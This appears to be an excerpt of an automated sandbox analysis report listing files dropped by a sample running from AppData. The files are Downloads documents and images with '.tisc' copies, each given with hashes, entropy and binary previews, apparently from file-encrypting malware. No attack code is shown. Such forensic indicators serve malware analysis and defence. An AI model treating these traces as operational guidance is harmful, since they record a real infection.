                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.824480771584375
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:0Ahp3thpGYJob0/alMQq8w8pGV1Z/jM8h4v3ess2oqZ24/FgN93ChGgbD:ZT3thpGYib0/MMXP8pGzZL1K3Hs21r/v
                                                                                    MD5:BE11F589679C2D650F29795402419612
                                                                                    SHA1:0025ACCC276203DBFEFC00218D2D1480F5897ACC
                                                                                    SHA-256:3F2C4911A0B6E547FC0F986AAE35874D5817D37AE0197C4AB871A40BB80A83DF
                                                                                    SHA-512:96951A46FAAA5BF8D2DA5A487E93F50057382F5D3FF8B20A3F5A65B5BDBE60A4409727F16F673567F32AA4FC35B6E00BB74441C447E0ACFA5974C6CCB93A90A5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....85.y..]?..R......4].1-......3....4+... .y..>....p...Pxp...#_..c.......8../..v...[s..AK<R...v.[.w..o..\..aL9..D..^3.......X.P"HqY.s.JLi...A......[.9F{oG.m..0.Q'&.......+2.:.vY..VpN$..,A.iO!...]....G.@*.......$6.....z.W.3.V.]...@.Q...B0od.K...N&.lJ...@..m......A&Y3....E9..F.k...o.2L...=1h...%I.3I...<3...;;.I...o.~F.!m.%..s.<.......Jvo.1..g..B7....qQ....uC.....{.L.Z.mf~..].\.V....&k|.z..T;..p.<.GA.....%.m.....:<j..].=y.Y,........[N>.&"6....X]...1AF+....D..uhv..*....z.....Dll..{.!.y.P.E.X;.\...-W.Qn..DR.P.P.....&....V.....t.2...0y5l.H..v.2..@,.e>...z.5I9.J.+......c.~......V....a].cb.9.<.9=..i.w..v9.~..c.k K...;&W..XO=....j......I'..P...l..........0 ........G.3.<YW.=..d.x6.../..,].".N...$.S..h..m....D...&C.Y...Z......G.0.Y..;n....G.......{..E..sK..........8...f..F.-....G.Z..a.N.H..n...O....opx.O=.9.&..DgE..0.KP.3.le.WZ,...B..F.......,.H....G.@.......o.......P..}.`..Q.lg.yZ.pe......E<..9.ju'*.j...T.|.nT/.Y.-.......uz..VD; .T...."2nyN...a
                                                                                    C:\Users\user\Downloads\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854436793170185
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6YUlHrWhHIM6o47dO7t5x9gBcUTulGh4NfRxCyaWp3TFNBq3QQqosOy2HyGxAgbD:SHrOdHT74BpTuRN5xC5+Y3Bly2HyGxZD
                                                                                    MD5:15B2D7672A58162BCFED2EC1DA60D3E2
                                                                                    SHA1:C8F6B548E6AD24810226F3CF3054B7CDA39FDEBA
                                                                                    SHA-256:8A8B5A26BEF1CB807F6CEBCE9773703F57FDDBCA5D7347E814D4FA2DF5184C30
                                                                                    SHA-512:38148666B7049E8DD4032D7B913A5B89A99D91D286573D0AC0D8F7D5731DFD5D754034ADD8EE2FAF9AA36E23DA39F0122263252080C2B53A821278A99CEF4963
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .G.Az....zS.T4.a./T..{e.U...j..#1.....z.L...F..u.....cy....e...q..E@.v=.w.^M7.V.gm.]....~m.1....4..O.b.wQ1....M.$N^b@<.4.G.f.xu. ....5^...-......{.q.[l..=N..|.WG..-Es.AP..?....#Jj....../..b.c.$..o.t..J.3c...03...?.....I...+.6Ngsq^..#].P........O._.....t..d.U...k...ZF..h..%.h..lW..S..P. ..9o#-..t.s.X.....y.L+.bq]...}9E..... .%^]..s....P.....cX..{.bD.A#v\^G]..Fh2.R.`..=....J<3~.a/.%y$......S)V.^% 8.H4...0..u.[|...h`.4...w..O.bs..M./.s.....^l.......uc...g.-z.)E..F....1.S.?.%.w...y..^...ar..m .<.. o.v....x..(.26.45*......`.F..E....1.8L.zU:d.lW..A. |..A9LP.].:..Z3....A.A.;p..E....3.Ck.C.U,.o.kt....T.....o.w.Q....d.pd..??....IS.N..F?.;..W..cj.............y...l....b.fk..>a....Je.....8..p"..`z..:.....d.:.%.DX..t)..>...i.t.~F;.5 ..P......,.,...J......y~.<....P_...XN82S...U......q$7j..,p....U'..i:....l3.....p...|0.7..~.n..o......PE.r....J.;...Y<...Q%L../..{~...;....n.......rO. .2LE...q.....Hw0l.....%.,.A7..zRW.o.......(.t.w#,....I../...-r5S.....
                                                                                    C:\Users\user\Downloads\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854436793170185
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6YUlHrWhHIM6o47dO7t5x9gBcUTulGh4NfRxCyaWp3TFNBq3QQqosOy2HyGxAgbD:SHrOdHT74BpTuRN5xC5+Y3Bly2HyGxZD
                                                                                    MD5:15B2D7672A58162BCFED2EC1DA60D3E2
                                                                                    SHA1:C8F6B548E6AD24810226F3CF3054B7CDA39FDEBA
                                                                                    SHA-256:8A8B5A26BEF1CB807F6CEBCE9773703F57FDDBCA5D7347E814D4FA2DF5184C30
                                                                                    SHA-512:38148666B7049E8DD4032D7B913A5B89A99D91D286573D0AC0D8F7D5731DFD5D754034ADD8EE2FAF9AA36E23DA39F0122263252080C2B53A821278A99CEF4963
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .G.Az....zS.T4.a./T..{e.U...j..#1.....z.L...F..u.....cy....e...q..E@.v=.w.^M7.V.gm.]....~m.1....4..O.b.wQ1....M.$N^b@<.4.G.f.xu. ....5^...-......{.q.[l..=N..|.WG..-Es.AP..?....#Jj....../..b.c.$..o.t..J.3c...03...?.....I...+.6Ngsq^..#].P........O._.....t..d.U...k...ZF..h..%.h..lW..S..P. ..9o#-..t.s.X.....y.L+.bq]...}9E..... .%^]..s....P.....cX..{.bD.A#v\^G]..Fh2.R.`..=....J<3~.a/.%y$......S)V.^% 8.H4...0..u.[|...h`.4...w..O.bs..M./.s.....^l.......uc...g.-z.)E..F....1.S.?.%.w...y..^...ar..m .<.. o.v....x..(.26.45*......`.F..E....1.8L.zU:d.lW..A. |..A9LP.].:..Z3....A.A.;p..E....3.Ck.C.U,.o.kt....T.....o.w.Q....d.pd..??....IS.N..F?.;..W..cj.............y...l....b.fk..>a....Je.....8..p"..`z..:.....d.:.%.DX..t)..>...i.t.~F;.5 ..P......,.,...J......y~.<....P_...XN82S...U......q$7j..,p....U'..i:....l3.....p...|0.7..~.n..o......PE.r....J.;...Y<...Q%L../..{~...;....n.......rO. .2LE...q.....Hw0l.....%.,.A7..zRW.o.......(.t.w#,....I../...-r5S.....
                                                                                    C:\Users\user\Downloads\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852477178069145
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:FAXSZzh3X2n/clZza9OXJ0uO7bNl+tn8rgwJ1FIw58ShpHzlBNfNgbD:FnZzh3Xw/cLa9sO7b3+W0wJ1758SrTlI
                                                                                    MD5:ACB2B657129B9A16289227266B64641E
                                                                                    SHA1:DF427D2541A25310A93C3126B95B1378CED40B2B
                                                                                    SHA-256:894005DC79762CD0326A26DB87860D6BBF455FAD20F8F0CD631B1A4924FCDF8E
                                                                                    SHA-512:508BF2E432BAA3E240C46C38977634C2664B94C3BE532E2ED7C653AE4A0B7421BF81B7052755FBA28DC17BF637F4027E0783F9DBF01C6DE1D2751F412A74A1F6
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: n@.....>..t!Y..0.1..42.*.....N.<b..\;.7.Yv.f.a\...(.;....".......ZB.olc..N.(......8.....i..W.$GX.J......I.(.@p.....9..E.X..C..`m(.......U.6.P(.x2..&..AB....e...2..9.E...`Y.*....5..].9Ou.....X[9.>/..4>..K......b............Y._....".....@.>.J....j....._..W4".1..Y.L|.D...^.n...F..Z...D.5....ED..O.s..!o..&...O`..|...w..NP[..C8=.=..f....8nJ.:n)l...qyJ<..@..K../}.1Xyg~.1..Gd..."....V....u!.Z(.:.P.....^A.\...G2......=..:....<.?%4o.y..fV4_...g.x..d...H.8.1.t...;@S..Ub.U^. .Y.8&..~....]..W.....:>.....^.......F.f.Y...%..&....2\.Iy...V.$...>............].[..H#q8I.4y.B..~..&G..w.w%..E..K..8tgF...........y+..s........2..h..........v...p.a......Tj.(...]..e.~../5.d.).M.....{*0i}...QP......).Ac...O$W>....O..<k.V.p|.E[.$w...0m...it.U...&.0..4,.t.A0....!A+.D}.........dLb.....^Y....xI..ef.4C.4.Z..k..R.e...I.*..k...3...A!..._.L.7....cS..|.\.g.....%....^Z.{p.N...xr...0........./T.zN...CV'...0.#.5..&......T.......$.....P.4......y..2.]..soxM........Q...
                                                                                    C:\Users\user\Downloads\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852477178069145
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:FAXSZzh3X2n/clZza9OXJ0uO7bNl+tn8rgwJ1FIw58ShpHzlBNfNgbD:FnZzh3Xw/cLa9sO7b3+W0wJ1758SrTlI
                                                                                    MD5:ACB2B657129B9A16289227266B64641E
                                                                                    SHA1:DF427D2541A25310A93C3126B95B1378CED40B2B
                                                                                    SHA-256:894005DC79762CD0326A26DB87860D6BBF455FAD20F8F0CD631B1A4924FCDF8E
                                                                                    SHA-512:508BF2E432BAA3E240C46C38977634C2664B94C3BE532E2ED7C653AE4A0B7421BF81B7052755FBA28DC17BF637F4027E0783F9DBF01C6DE1D2751F412A74A1F6
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: n@.....>..t!Y..0.1..42.*.....N.<b..\;.7.Yv.f.a\...(.;....".......ZB.olc..N.(......8.....i..W.$GX.J......I.(.@p.....9..E.X..C..`m(.......U.6.P(.x2..&..AB....e...2..9.E...`Y.*....5..].9Ou.....X[9.>/..4>..K......b............Y._....".....@.>.J....j....._..W4".1..Y.L|.D...^.n...F..Z...D.5....ED..O.s..!o..&...O`..|...w..NP[..C8=.=..f....8nJ.:n)l...qyJ<..@..K../}.1Xyg~.1..Gd..."....V....u!.Z(.:.P.....^A.\...G2......=..:....<.?%4o.y..fV4_...g.x..d...H.8.1.t...;@S..Ub.U^. .Y.8&..~....]..W.....:>.....^.......F.f.Y...%..&....2\.Iy...V.$...>............].[..H#q8I.4y.B..~..&G..w.w%..E..K..8tgF...........y+..s........2..h..........v...p.a......Tj.(...]..e.~../5.d.).M.....{*0i}...QP......).Ac...O$W>....O..<k.V.p|.E[.$w...0m...it.U...&.0..4,.t.A0....!A+.D}.........dLb.....^Y....xI..ef.4C.4.Z..k..R.e...I.*..k...3...A!..._.L.7....cS..|.\.g.....%....^Z.{p.N...xr...0........./T.zN...CV'...0.#.5..&......T.......$.....P.4......y..2.]..soxM........Q...
                                                                                    C:\Users\user\Downloads\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.835432952065649
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:RzkrkR1dBwWivsUPN8NCeogaKNq3grtIA5sJhVlpGEliZ2353hcqRXgbD:bhBaXGNpaKNq3615YhlliIpxXRKD
                                                                                    MD5:08BE7041AA8173D7DAA99D926B521309
                                                                                    SHA1:2CB680899BB5F56CDFDB6DA36E684E03E1A810D0
                                                                                    SHA-256:481A090CB733493F9F1B710F1234EBBC404F513D947001E214E936AFEC0D8987
                                                                                    SHA-512:80893D64D308780B716A1A7B50DFBB7F59641E83B27A16329B19884F8CA335813A0E896363A158A5B603A923E296FCF8E015E7916435B177766C249C209526D7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...,...mk.Vk..rg.v...]..a..p8.[...j....'.W.....C..4.>....*A^...,.Vr......)u....g.b./..5...9......<e.:.e...=\.}......T.5.P...F.Kq.*....I.3s...4.j.1./c.6p._.\9..M...kp....^....=y...q.)......'.a..X.."#.p.....V..0...T.\..4s*... .QA.4?crt.XF..V.c.l...j.L.O#tv...AX..x1..A.<..^1.....GsJ.!.$.5....-.yX.......K.rA...:....NR.E.9<H..4TY..q...a5.Y....Z..`k|I..>2(.zpZ...O'..H...~.<rqdtI...Y.....1hM.....:...f.....7.....h..j@].p.?wcnfV..a.^....c..;....:...3Z.wyu.O1u..M..0......q....r-........G,...c..Q.......'.o..e.....j...NXJ.e...lNEt......es....d.p..M...P..\..H[..~.^b.....+..8.E<u..q.Y.<)m..?.#.....@Nq._"M.}......MJWXp..G.0..Cy]J.....p..Kfd....}b...........TL......B._6.P.l|_mk..^<.G?SP...e.7P.....F...}H.k.A.{...`.C4.C...n;.A....0.JP.C..(..ci.....8.r.....I.....<K.=A.........YD.l^.W...j.t|.NUI....C...c|.1..d....`..x.g>e..'..P.(...2!G.:..}@.../.&?...l.m..YO...c.:....`...^.....p......YU...........n.L2@..g.A._.oR...9...4l....D...!.1_......b./].
                                                                                    C:\Users\user\Downloads\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.835432952065649
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:RzkrkR1dBwWivsUPN8NCeogaKNq3grtIA5sJhVlpGEliZ2353hcqRXgbD:bhBaXGNpaKNq3615YhlliIpxXRKD
                                                                                    MD5:08BE7041AA8173D7DAA99D926B521309
                                                                                    SHA1:2CB680899BB5F56CDFDB6DA36E684E03E1A810D0
                                                                                    SHA-256:481A090CB733493F9F1B710F1234EBBC404F513D947001E214E936AFEC0D8987
                                                                                    SHA-512:80893D64D308780B716A1A7B50DFBB7F59641E83B27A16329B19884F8CA335813A0E896363A158A5B603A923E296FCF8E015E7916435B177766C249C209526D7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...,...mk.Vk..rg.v...]..a..p8.[...j....'.W.....C..4.>....*A^...,.Vr......)u....g.b./..5...9......<e.:.e...=\.}......T.5.P...F.Kq.*....I.3s...4.j.1./c.6p._.\9..M...kp....^....=y...q.)......'.a..X.."#.p.....V..0...T.\..4s*... .QA.4?crt.XF..V.c.l...j.L.O#tv...AX..x1..A.<..^1.....GsJ.!.$.5....-.yX.......K.rA...:....NR.E.9<H..4TY..q...a5.Y....Z..`k|I..>2(.zpZ...O'..H...~.<rqdtI...Y.....1hM.....:...f.....7.....h..j@].p.?wcnfV..a.^....c..;....:...3Z.wyu.O1u..M..0......q....r-........G,...c..Q.......'.o..e.....j...NXJ.e...lNEt......es....d.p..M...P..\..H[..~.^b.....+..8.E<u..q.Y.<)m..?.#.....@Nq._"M.}......MJWXp..G.0..Cy]J.....p..Kfd....}b...........TL......B._6.P.l|_mk..^<.G?SP...e.7P.....F...}H.k.A.{...`.C4.C...n;.A....0.JP.C..(..ci.....8.r.....I.....<K.=A.........YD.l^.W...j.t|.NUI....C...c|.1..d....`..x.g>e..'..P.(...2!G.:..}@.../.&?...l.m..YO...c.:....`...^.....p......YU...........n.L2@..g.A._.oR...9...4l....D...!.1_......b./].
                                                                                    C:\Users\user\Downloads\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845135871991003
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:u/deDicsfbGhlDePasSM9n/RBrN/dUMqZLR0RSRzzSYY3GRf6wjmZVord5gbD:uaM63MPR1UMgLqi6YY3jwSgBwD
                                                                                    MD5:1116E4F9AC21587E58C694839662FB73
                                                                                    SHA1:22A611C46A52FF837E2331929921F58B3009397B
                                                                                    SHA-256:3783C2F2AB46B152FCF048D547AA3A5CEF8EC1965CA15ACF0E8A28BDEE1064A8
                                                                                    SHA-512:436D6F271675D4BAFA3AF50B4461042351453BBA3D4B540FBA8A27005FCD39E75538DA009782D1A19D28A42BA2B1DF7FA15ADC397BB72A5506E2802A6E3D9C67
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: v..b.SdF..@.H. ..nu#.4J+S.(.5[...L@j.m....S..+n...y1.......\:....^..d.`.#.f?.A.F...[.+n.io....q.h..9U.{..8.q.B..g(Kr)./.d..Y.. /....,..i=...9......n........=Px..7.J....rO)...&.#...H!M(Y..|..z.....a./..H...|..1..|..>t6...D......B.b.pC7y....cJ..;toJ....8".N.0....md.>wr`.l.^.T..4...i-Ff.vO...J.YU...I.~*.u]....|.......9.......~N..VM..........s.8.y...y..4...z..y.....*.S_......n(r...Z/.A......9....2.Dg.:b,)b;..*.....K.9`... .........o.....&.......X.U6m.......|..jy"P..x.L...1. . ......n.Pfp.m03...OP.....k.Jx.S.._.....L.5.W.0.9.{bA..g6.....Z=..imj...,...\}.i.OaU.{.`.D........ht.'..KR...I\....XZ..X....t.".-.........?........l....I....NI.. .....E.h....O...`..............1..>PD...}:6.c..'R-.. .V...SD....ad..U.....b.=..BEKHu.6...t.N.a..).p.x....u$'.S.T..N..;..l.:P#.o..?+....].Lp.;.ym<.-...3.7..kb..=.n...t.....R."X<.....,u/..N..)V...W0rY.&.........L8...3i7&g.8..nA.C..j.6...%E0.....p...N. ..".)O-.nJ.e.m|.g.q.n.J..........1..s..?-.<.o......,.T.I....
                                                                                    C:\Users\user\Downloads\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845135871991003
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:u/deDicsfbGhlDePasSM9n/RBrN/dUMqZLR0RSRzzSYY3GRf6wjmZVord5gbD:uaM63MPR1UMgLqi6YY3jwSgBwD
                                                                                    MD5:1116E4F9AC21587E58C694839662FB73
                                                                                    SHA1:22A611C46A52FF837E2331929921F58B3009397B
                                                                                    SHA-256:3783C2F2AB46B152FCF048D547AA3A5CEF8EC1965CA15ACF0E8A28BDEE1064A8
                                                                                    SHA-512:436D6F271675D4BAFA3AF50B4461042351453BBA3D4B540FBA8A27005FCD39E75538DA009782D1A19D28A42BA2B1DF7FA15ADC397BB72A5506E2802A6E3D9C67
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: v..b.SdF..@.H. ..nu#.4J+S.(.5[...L@j.m....S..+n...y1.......\:....^..d.`.#.f?.A.F...[.+n.io....q.h..9U.{..8.q.B..g(Kr)./.d..Y.. /....,..i=...9......n........=Px..7.J....rO)...&.#...H!M(Y..|..z.....a./..H...|..1..|..>t6...D......B.b.pC7y....cJ..;toJ....8".N.0....md.>wr`.l.^.T..4...i-Ff.vO...J.YU...I.~*.u]....|.......9.......~N..VM..........s.8.y...y..4...z..y.....*.S_......n(r...Z/.A......9....2.Dg.:b,)b;..*.....K.9`... .........o.....&.......X.U6m.......|..jy"P..x.L...1. . ......n.Pfp.m03...OP.....k.Jx.S.._.....L.5.W.0.9.{bA..g6.....Z=..imj...,...\}.i.OaU.{.`.D........ht.'..KR...I\....XZ..X....t.".-.........?........l....I....NI.. .....E.h....O...`..............1..>PD...}:6.c..'R-.. .V...SD....ad..U.....b.=..BEKHu.6...t.N.a..).p.x....u$'.S.T..N..;..l.:P#.o..?+....].Lp.;.ym<.-...3.7..kb..=.n...t.....R."X<.....,u/..N..)V...W0rY.&.........L8...3i7&g.8..nA.C..j.6...%E0.....p...N. ..".)O-.nJ.e.m|.g.q.n.J..........1..s..?-.<.o......,.T.I....
                                                                                    C:\Users\user\Downloads\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8662794329640455
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:BfpUMJE5KuPLQm5KpO1ehULa3WPqA1sx3xQ+WA/FISsYlI58/KgbD:lpUPwZ5hTG943xQ+X/FvsovD
                                                                                    MD5:4F09BF1057097716B1A496A6E96807D4
                                                                                    SHA1:7CF877BE389FB675F4F331E5C0A4DDFA074DD9AE
                                                                                    SHA-256:0EAC3F8D768B607D4E1876D895F288716F458B7093D1F0C50CEF33A8711B00DA
                                                                                    SHA-512:91B3A7830E311C7E9C986F507874D0849E328FA220014B00AB6B488905C021120D8087F2A4860C36342BB6896D630E50BE35988BAD6E18AA8211A101A6EC4B65
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .x....._.%..w0....`...^8..O!.G(...8zZ@..>.4R...P....7r.H.....U..3...i.R.P...>YYaI...S... ....uN.v;..4.}F.x...T.Sq....p...I.+...m..S...w......5.....Diz\..*..U5.w..3........&.....g.<..e.R....BL.GW.R.._.Q3..+\........#R9j...0C.....W.1/V.r.j....~..D@Q|L...-M1k.....JN....D..".$Q.t.v<.K............H.........D_$..S...h......Q..%.b.O...H.\......X.....ieo.x_...r5...s..]<....G.... U...P[..}.N.2Z..../..u.n..7~........o..../Hv.O....Ij1%..........?.h.j...L.......$..v..d3.o...A....B..L.4........ ....o.9&.W1K.)....R.w....o-.f+6![H...J.A@X....?....|..U...8..F!....v.....c..B..6.......q..\.....K .`..{.jNp. ..'.......38:.....a..uX...k;.*.xq(......@."d..hm..w..V(...9.VZ.Yc8..... D..D....YB.pw.GwYd''.sYL.W >..4...../?[...].a.../......r.....s.LF.P....{b.......D.......v.P.X.D4P...u*.. ..7..Y....^..E.P......>.E.nf.."9..E!..rx.D......pS...*...Qt...5.....b}.>......"."..J...P.z?{?....\.%N...=..m.MT?Z$.p......nD1..}........f..F..w.9......%~...0...F.4o.`k<.V/.D#
                                                                                    C:\Users\user\Downloads\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8662794329640455
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:BfpUMJE5KuPLQm5KpO1ehULa3WPqA1sx3xQ+WA/FISsYlI58/KgbD:lpUPwZ5hTG943xQ+X/FvsovD
                                                                                    MD5:4F09BF1057097716B1A496A6E96807D4
                                                                                    SHA1:7CF877BE389FB675F4F331E5C0A4DDFA074DD9AE
                                                                                    SHA-256:0EAC3F8D768B607D4E1876D895F288716F458B7093D1F0C50CEF33A8711B00DA
                                                                                    SHA-512:91B3A7830E311C7E9C986F507874D0849E328FA220014B00AB6B488905C021120D8087F2A4860C36342BB6896D630E50BE35988BAD6E18AA8211A101A6EC4B65
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .x....._.%..w0....`...^8..O!.G(...8zZ@..>.4R...P....7r.H.....U..3...i.R.P...>YYaI...S... ....uN.v;..4.}F.x...T.Sq....p...I.+...m..S...w......5.....Diz\..*..U5.w..3........&.....g.<..e.R....BL.GW.R.._.Q3..+\........#R9j...0C.....W.1/V.r.j....~..D@Q|L...-M1k.....JN....D..".$Q.t.v<.K............H.........D_$..S...h......Q..%.b.O...H.\......X.....ieo.x_...r5...s..]<....G.... U...P[..}.N.2Z..../..u.n..7~........o..../Hv.O....Ij1%..........?.h.j...L.......$..v..d3.o...A....B..L.4........ ....o.9&.W1K.)....R.w....o-.f+6![H...J.A@X....?....|..U...8..F!....v.....c..B..6.......q..\.....K .`..{.jNp. ..'.......38:.....a..uX...k;.*.xq(......@."d..hm..w..V(...9.VZ.Yc8..... D..D....YB.pw.GwYd''.sYL.W >..4...../?[...].a.../......r.....s.LF.P....{b.......D.......v.P.X.D4P...u*.. ..7..Y....^..E.P......>.E.nf.."9..E!..rx.D......pS...*...Qt...5.....b}.>......"."..J...P.z?{?....\.%N...=..m.MT?Z$.p......nD1..}........f..F..w.9......%~...0...F.4o.`k<.V/.D#
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828759405356668
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:c01omHNdxElMyzokwfquyD5kBxm7MrIi+7aMzcVEFkqU4gbD:cq1dxcskwfqRuU7M8N7/zLPQD
                                                                                    MD5:691392ED37563292FE9B7C3DA9248D78
                                                                                    SHA1:158643E103C261A01A819FA822BC758EBEF06612
                                                                                    SHA-256:F2E6BEB9BC8156BFFEBFC1D441E3AD05D9A62AD4066622A6D60B265C748BA155
                                                                                    SHA-512:AC0620DB6EDF90D590D4B09E99D0D90A567B6C3840F8FFFFE805ABCFB32234B7706D2DBE027A918B60CE237101AB964D40E60A73A0A5C329A8731D2D1FF662CE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: e.f.Asi*.a.o.7t}..\^:...W..'2.\|'Q...Q^...W.yfo.z..7"..0....`4y+.%....t.h.f3.*.E...e.x.4#.....G......Z.5E...*,/....T>.A.......<..d.$.c..+z-.z..t.Y..fs'6D..................8r./..Y[..B...;....MpPW.Zq.3|./>...d.7.w.V.7.W.TS.:.@I......=.K3P]..Vh........W..7!cW..JJt.#.............W....z.........c.TS...L".s.\.../..Z.3.%W....R.A.<;.. ..7.n...#.....v..% .y3.\F..?.M....%=L.I.S{..>.......s3.+\]&H...(.X..x.G"Q...Sr..Z...........L..Y.B."u...?..i..3.4..P.....8x).....h....yE.......<.....d......e...{......4.4.....*...So..us.L....+?.$..@..FD....y...u'..\!.o. ....254`..~+Z.ZJ...g...#X...&.QAs..`v..,(.`.?.O.._Z...m..........Z3.6..z..% ..Q.?.)z.{$H.l~y...:M./x.w.".`...*...hl..+..qx.e..H%!....S..;.e%.~k.za..:F.j...2l?V.j.{.5.A.)j..a.,...%.I...._..N...}....y...Y...J.<...\l4..mT../.uj.9.`...:$b.\aK8.@CN|D+`....f.T@j.p..=OQ.O...-..vj....S....V....VlyF.H.L.(...W.e.sa."hSMf_..?.D.....S.Vv...!.....A,......n.....!@.^.}aA.f..6#v.$..<@.O.aY.`Yk-.....4....Wv... . {&`.t.
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828759405356668
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:c01omHNdxElMyzokwfquyD5kBxm7MrIi+7aMzcVEFkqU4gbD:cq1dxcskwfqRuU7M8N7/zLPQD
                                                                                    MD5:691392ED37563292FE9B7C3DA9248D78
                                                                                    SHA1:158643E103C261A01A819FA822BC758EBEF06612
                                                                                    SHA-256:F2E6BEB9BC8156BFFEBFC1D441E3AD05D9A62AD4066622A6D60B265C748BA155
                                                                                    SHA-512:AC0620DB6EDF90D590D4B09E99D0D90A567B6C3840F8FFFFE805ABCFB32234B7706D2DBE027A918B60CE237101AB964D40E60A73A0A5C329A8731D2D1FF662CE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
